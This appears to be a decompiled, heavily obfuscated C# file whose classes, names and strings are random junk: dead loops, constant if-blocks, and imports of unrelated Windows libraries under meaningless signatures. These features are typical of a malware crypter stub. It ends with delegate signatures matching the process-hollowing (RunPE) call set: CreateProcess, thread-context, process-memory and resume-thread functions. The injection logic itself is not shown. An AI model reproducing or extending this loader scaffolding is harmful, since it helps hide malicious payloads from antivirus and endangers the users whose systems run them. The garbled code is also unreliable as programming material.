public class ÈÉÓÜj
private string Â˵Ái;
private ushort ÇslÿÒÏ;
private float ße0Ü3;
public ÈÉÓÜj()
this.Â˵Ái = "DNTY-X2[T]2";
this.ÇslÿÒÏ = (ushort) 26247;
this.ße0Ü3 = 0.0f;
[DllImport("oleacc", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void ÓÌÕ([MarshalAs(UnmanagedType.VBByRefStr)] ref string ÏmeÖ);
[DllImport("msvcrt", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern ushort ËiÜÇuº(int ÝÊ);
public void iÛÙ2k(
Decimal ÅrÇ,
bool i7lØhÉ,
long cÒ,
Decimal ÉÆÅ6)
if (true)
Decimal limit = 45M;
Decimal num = 3M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M))
num = Decimal.Add(num, 1M);
public delegate short j6vn(
ushort Ùam6Ô,
byte ÅÍ4Å,
string ÄÀgb);
public delegate uint qÅÉÝ();
public class ºÉËÓÙ
private ushort fÈÍÕÁÜ;
private uint ÑjÏÕiq;
public ºÉËÓÙ()
this.fÈÍÕÁÜ = (ushort) 15641;
this.ÑjÏÕiq = 0U;
public void Ü6Þ(Decimal Þl)
if (false)
string str1 = "sD8.%c@[7O^>";
int index1 = 0;
for (int length = str1.Length; index1 < length; ++index1)
char ch = str1[index1];
string str2 = "[pz7Q0yL0";
int index2 = 0;
for (int length = str2.Length; index2 < length; ++index2)
char ch = str2[index2];
public uint ÕßyÛ(
bool gÁÏ,
ushort Ãb,
byte Úug,
uint ÝÅbÂ7a,
ushort lÆÚeÚ)
if (true)
if (true)
return 671087499;
public delegate void vÄoÎØ(
DateTime Ärw,
short Ñÿqµ,
int Þ5,
double kÚ);
public class p6oÖ
private Decimal gÔ;
public p6oÖ() => this.gÔ = 669000775M;
public void pdzuÈ(string ÂÏÿ)
sbyte num1 = 9;
while (num1 <= (sbyte) 54);
string str = "1Q<U+";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
short num2 = 12;
if (false)
while (num2 <= (short) 37);
[DllImport("pstorec", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int f1Úm(
long µ7pÍÛÝ,
bool ÂmÁid,
sbyte Í5ÕÉË);
[DllImport("wtsapi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern double ÅØ(DateTime ÂÕØ, short gzs1vÛ);
public delegate void gÑ(short Ö5ÑÚÁ, uint ÌÁvxÍ);
public delegate void mk();
public class ÑÃ1
private sbyte Ìjd;
public ÑÃ1() => this.Ìjd = (sbyte) -18;
public void Ým(byte Ñ9, short fu)
if (false)
if (false)
public void vi(uint jß, ushort k1g, DateTime Ñß, string ß7)
string str = "F:w";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
int num1 = 3;
while (num1 <= 63);
byte num2 = 5;
if (true)
while (num2 <= (byte) 44);
if (false)
public void ÁÚÕ(short ßt)
if (true)
public void ek(
sbyte ÞÞy8h,
short µiwbi,
Decimal ÖoÌÍ0,
short nvÇ,
double cf7ÈÒ)
public class Äzm
private byte ÜÊxÑ;
public Äzm() => this.ÜÊxÑ = (byte) 174;
[DllImport("imm32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void ÒraÒ(
short hurd89,
double fÂ5xh,
ulong ÞgÌ,
Decimal Àe);
public delegate void mtvß(
sbyte ÜÍÙzw,
string aÝ,
short ljb,
string aÅj_2);
public class uÐÔ3rk
private bool pÃÄÀ;
public uÐÔ3rk() => this.pÃÄÀ = true;
public uint hÜÄ(bool iaÁºÜ, bool ÃËlkÎË, Decimal ÔfÓ)
if (true)
if (true)
string str = "VI>X}j";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 0;
public byte È48ÏÆv(
long ÚÊ,
short bex7Ã,
string aÀÓ,
ulong f25l,
long nÖl)
if (false)
if (true)
if (false)
string str = "**I'";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 31;
public class Åm
public Åm()
public byte zoÄÖ(
Decimal uÖÊØpÞ,
float Âmº,
bool ÓxÖzÈ3,
bool ÖÜllz)
bool flag = true;
if (false)
if (!flag)
return 145;
public delegate void Ï();
public class ÜÆit
private string m33;
private double Édjx7;
public ÜÆit()
this.m33 = "2/B";
this.Édjx7 = -10323.6;
public class qËu
public qËu()
public bool h2Á(uint t3Ê)
if (false)
return false;
[DllImport("shell32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern long q6(long bÌ, sbyte ÓËa, bool غ);
[DllImport("fwpuclnt", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern bool Ùk_4Á(
float ÚmfÌÑ,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ÖÃØÓØu,
Decimal Ì1ÿ8uo,
Decimal hÉ8Íxµ,
ulong ÙsvÿÆ);
public delegate void Ø2lË6Ï();
public class cÙµÚvß
private byte gc;
private float À1ÎÅ;
public cÙµÚvß() => this.À1ÎÅ = 16754.4f;
public short fÌ2ÀsØ(short Ûvß)
if (true)
double num1 = 16.0;
if (false)
int num2 = 6;
while (num2 <= 100);
long num3 = 20;
while (num3 <= 82L);
while (num1 <= 56.0);
return 0;
public void yÓb(short iÐÝÓÙ)
string str = "tW#<fJ<8";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
public delegate sbyte m(uint zuÖ, int a, byte Â, byte ÏÕ);
public class ÏÞ
private double ÏnÝn;
public ÏÞ()
public byte ryÿ8Ü()
string str = "W2b(ic";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 13;
public float ÄkÅ(ushort ÊsÑiµo, Decimal ÈØ, sbyte Ého8hº)
string str1 = "6t";
int index1 = 0;
for (int length1 = str1.Length; index1 < length1; ++index1)
char ch1 = str1[index1];
double num1 = 11.0;
string str2 = "J&zk/c(";
int index2 = 0;
for (int length2 = str2.Length; index2 < length2; ++index2)
char ch2 = str2[index2];
while (num1 <= 83.0);
ushort num2 = 3;
while (num2 <= (ushort) 48);
return 31582.05f;
public class Ø2ÖÓ
private ushort z0y;
public Ø2ÖÓ() => this.z0y = (ushort) 15815;
public delegate void ÐÊ_Îf(
DateTime fÙj4p1,
DateTime Éf,
int r,
sbyte Äo4ºÜ,
double Îq);
public class Ô6Ô
public Ô6Ô()
public float yÌ(ulong È, float Ù0, DateTime dÉÖw, double Õ8ºlÃ, short zvÈÿ)
Decimal limit = 62M;
for (Decimal num1 = 7M; ObjectFlowControl.ForLoopControl.ForNextCheckDec(num1, limit, 1M); num1 = Decimal.Add(num1, 1M))
if (true)
uint num2 = 2;
while (num2 <= 117U);
if (false)
bool flag = true;
if (false)
if (!flag)
return 0.0f;
public Decimal Ù4ÚryÛ(float Åc)
if (true)
return -563012958M;
public class ÐgÍ
public ÐgÍ()
public int Ñ(sbyte z16ÕËÿ)
bool flag = true;
sbyte num1 = 3;
Decimal limit = 100M;
Decimal num2 = 14M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num2, limit, 1M))
num2 = Decimal.Add(num2, 1M);
while (num1 <= (sbyte) 68);
if (!flag)
return 0;
public delegate void Û(float ÑÎ1ÙÈÇ, int s);
public delegate void muvÉÕ(int ams, ushort µnÕÅÙe, DateTime ÅÂÉË);
public class h7Î
private ushort ÍÚ;
public h7Î() => this.ÍÚ = (ushort) 10442;
[DllImport("shell32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern sbyte ÈØi1tj(
double º,
short ßÖÆ5,
Decimal kÖ1uez,
bool ºÝ68,
DateTime ÿ0ÄÊ);
public short fÍbÕaÌ(short bvºota, long Ú0Ú)
int num = 11;
while (num <= 24);
return 12155;
public class À
public À()
public void i(float gb_)
bool flag = true;
int num = 3;
string str = "2N<W ";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
while (num <= 89);
if (!flag)
if (false)
public class c
public c()
public DateTime kl6Â(Decimal uÿÄÂÕ)
if (false)
byte num = 7;
while (num <= (byte) 85);
return DateTime.Now;
public class ÐÄÕÉ
public ÐÄÕÉ()
public void ÜÖÃ(float nbÁ5ÛÉ, string zvÖÊÜÔ, byte ÖÚß4Ñ)
if (true)
Decimal limit = 70M;
for (Decimal num = 16M; ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M); num = Decimal.Add(num, 1M))
if (false)
if (true)
string str = "Pz2g(t";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
if (false)
public delegate uint dÚ(ushort Ñ̵ÂÚ2, Decimal ÆÆ9e, bool nÜÉ);
public class hÁ1fo
public hÁ1fo()
[DllImport("uxtheme", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void aÑÿÓ(byte Ç_5Ñ);
public class pÐÌ
public pÐÌ()
public void Ë(Decimal vØ, int jm)
if (false)
if (false)
if (true)
if (true)
public delegate uint je();
public class Ê
private uint nwÕÁ;
private sbyte Ð7;
private float piÒ7;
private double e;
private float µp1ß;
public Ê()
this.nwÕÁ = 1283629720U;
this.piÒ7 = 0.0f;
this.e = 24899.6718;
this.µp1ß = -27629.0449f;
public ushort ÙÔÝ(string Ç1, Decimal Þ, sbyte Æ2)
DateTime now = DateTime.Now;
return 16531;
public class ÃjÈ4iÐ
private ulong tÉ;
public ÃjÈ4iÐ()
public void ÓÃ9()
int num = 16;
while (num <= 105);
public void ÿ4jo(ushort Ñja2j, string Õ5Â)
int num = 17;
while (num <= 120);
if (true)
public class ÄsÐ
public ÄsÐ()
[DllImport("mqrt", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern float ÞbÄÒo(uint tÃ);
public class Èv5É
public Èv5É()
public class ºÙ
public ºÙ()
[DllImport("xolehlp", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void idÊÍ1(long Êßr, Decimal ÑͺÑÏk);
public sbyte xÅÆÂÐ(
DateTime ºÉÃÔÕx,
short eyqp0,
double ÇÁÒ,
float Ävf,
Decimal jdØ)
string str = "TfPJT3U~d";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 114;
public ulong dm(ulong nßbÓ, ulong z4Ý0_)
bool flag = true;
if (false)
if (flag)
int num1 = 1;
byte num2 = 8;
while (num2 <= (byte) 22);
while (num1 <= 45);
string str = ".{P)nM'yk";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 1096881338;
public int Õ(double g2)
if (true)
ushort num1 = 10;
while (num1 <= (ushort) 105);
ulong num2 = 9;
while (num2 <= 43UL);
Decimal limit = 34M;
Decimal num3 = 15M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num3, limit, 1M))
num3 = Decimal.Add(num3, 1M);
if (false)
sbyte num4 = 14;
while (num4 <= (sbyte) 83);
return 0;
public delegate void ËÝ(byte ÌdaØ);
public class umb4
public umb4()
public class ÊkÊ7u
private DateTime ËÕÎ4;
public ÊkÊ7u() => this.ËÕÎ4 = DateTime.Now;
[DllImport("oleacc", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Decimal Åv(
bool l,
float Þm,
DateTime ÄÎØÜ,
int nv);
public void dÒÅ(DateTime s5ÚÎu)
string str1 = "t)[j1ai'4";
int index1 = 0;
for (int length1 = str1.Length; index1 < length1; ++index1)
char ch1 = str1[index1];
if (true)
byte num = 2;
while (num <= (byte) 79);
string str2 = "xn5}!d(,R3";
int index2 = 0;
for (int length2 = str2.Length; index2 < length2; ++index2)
char ch2 = str2[index2];
string str3 = "m#f.";
int index3 = 0;
for (int length = str3.Length; index3 < length; ++index3)
char ch = str3[index3];
if (false)
public class Ç2s
private Decimal kÍÝ_;
public Ç2s() => this.kÍÝ_ = 978739855M;
public void su63Üe(
short kkÎwË,
string uÑ3m,
bool e15À,
double ÃÏ)
uint num = 11;
while (num <= 72U);
public class ÓÐÐdaÖ
private string Òµpÿn;
private string ÎÂ;
private long oÒ;
public ÓÐÐdaÖ()
this.Òµpÿn = "U,6_5";
this.oÒ = -174879108L;
public class s69erÂ
public s69erÂ()
public void gja(DateTime Èßk)
if (true)
public delegate int nede(
Decimal bÿÅs,
DateTime duÙ,
ulong q5È5_a);
public delegate double ÿb8Ñ68(short Êqp, double Ør);
public class gÑÒxÀÝ
private ushort aÂÅÖ;
public gÑÒxÀÝ() => this.aÂÅÖ = (ushort) 7582;
public sbyte ÕÓ7ÐfØ(uint hÞuÇÖ, short ÝnÇËg)
float num = 18f;
while ((double) num <= 93.0);
return -2;
public void r032Óx(long vµ5)
string str = "2.Fj-o=6";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
public class ÿÂ4µgÜ
public ÿÂ4µgÜ()
public byte ÒÓÄ()
short num = 18;
if (false)
while (num <= (short) 81);
return 173;
public class ßzv
private string vbc;
public ßzv() => this.vbc = "'%~o";
public double ÙÑÓÕ1Ó(
double iµm,
byte ÞÇÂ,
DateTime Ù7,
string Ä6)
Decimal limit = 107M;
for (Decimal num = 11M; ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M); num = Decimal.Add(num, 1M))
if (false)
if (false)
return -3448.48;
[DllImport("netapi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern string ÔtßÞ(
double ÊÓÜ,
bool Ó2_,
double eÝem4,
bool ÇËÞÆ);
public Decimal kylafv(string ÏpÛrÅa)
if (true)
if (false)
if (false)
int num1 = 2;
float num2 = 17f;
while ((double) num2 <= 82.0);
while (num1 <= 125);
return -48773681M;
public class ÓÑßÚc
private ulong cqÃÔÑÄ;
public ÓÑßÚc() => this.cqÃÔÑÄ = 306013183UL;
[DllImport("hhctrl", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern sbyte ÄÂÂÀ(sbyte dts);
public delegate byte ÕqÓ0Ú(
uint ÑÌr,
Decimal ÅÜÒ1,
sbyte ÏÞaÔhw,
DateTime nÓ6);
public class aßo
public aßo()
public class q
public q()
public delegate void ÁÌÉËÇ(
byte ßoµØÛÒ,
double Ç,
long vÒÊe,
short s7f73Å,
sbyte jÔkpuÂ);
public class ÿd
public ÿd()
public delegate void ÝÉvnÛa(string s8È3Âv);
public class krÛt
public krÛt()
public delegate ulong a0Ö(
Decimal dmÕÍb,
ushort Ý8pÀ2,
uint ÀßÌ,
Decimal ÔdsÜ,
string ÆÚÀÑcÈ);
public delegate void ÀÞÏu();
public delegate void ÍÞß1(
byte bÉ,
sbyte jÅÆt,
DateTime Ä,
sbyte pÕ_2,
double Á);
public class gÒ2ßÈ
public gÒ2ßÈ()
public class zÜÒÃi
public zÜÒÃi()
public class ÁklË
public ÁklË()
public delegate void kb();
public class Í
public Í()
public class ØÁÀÑÕ2
public ØÁÀÑÕ2()
public class ÀbÃØÈØ
public ÀbÃØÈØ()
public class x
public x()
public delegate DateTime ÁÃnx(bool Òt);
public delegate void dÌ1e(bool bg4, long ÑÉ, float Âÿ);
public class Özj
public Özj()
public class ǵ
public ǵ()
public class qbÉÃÕ
public qbÉÃÕ()
public class xµ3jhr
public xµ3jhr()
public class ÝqvÝ
public ÝqvÝ()
public class ÛÌÍÍ
public ÛÌÍÍ()
public class ÄidÅÊ
public ÄidÅÊ()
public delegate DateTime sÿhÂb(uint ÒxrhØ, float jeß);
public delegate void Ó4o6Ü(sbyte ÐÃm, string º5ÿÇ);
public class Ñ4vÿ
public Ñ4vÿ()
public delegate bool paÉØop(long ÍÃ5yl, int pb, ulong eÁÜÑÕ, bool zÙ9º);
public class Í8Ë
public Í8Ë()
public delegate void ÏÌcËÈÝ(ulong Î6b);
public delegate ushort ßnuxs6(string Ö, short É6h);
public delegate bool yÝÆbl(
string ÿеÚÌ2,
string qÂ,
IntPtr h,
IntPtr ÎÌÆ8,
bool edÇ,
int ÏÒÂko9,
IntPtr Öºßi,
string ÝzÌ,
byte[] Ä2Õlu,
IntPtr[] ÖÔ);
public delegate bool nØ(IntPtr ÿеÚÌ2, uint[] qÂ);
public delegate uint ÉÉr(IntPtr ÿеÚÌ2, IntPtr qÂ);
public delegate bool w_zzÛ(IntPtr ÿеÚÌ2, IntPtr qÂ, byte[] h, IntPtr ÎÌÆ8, ref IntPtr edÇ);
public delegate bool cÈØ(IntPtr ÿеÚÌ2, IntPtr qÂ, ref IntPtr h, IntPtr ÎÌÆ8, ref IntPtr edÇ);
public delegate int ßu5jÆy(IntPtr ÿеÚÌ2);
public delegate IntPtr mÎhÄÀa(IntPtr ÿеÚÌ2, IntPtr qÂ, IntPtr h, int ÎÌÆ8, int edÇ);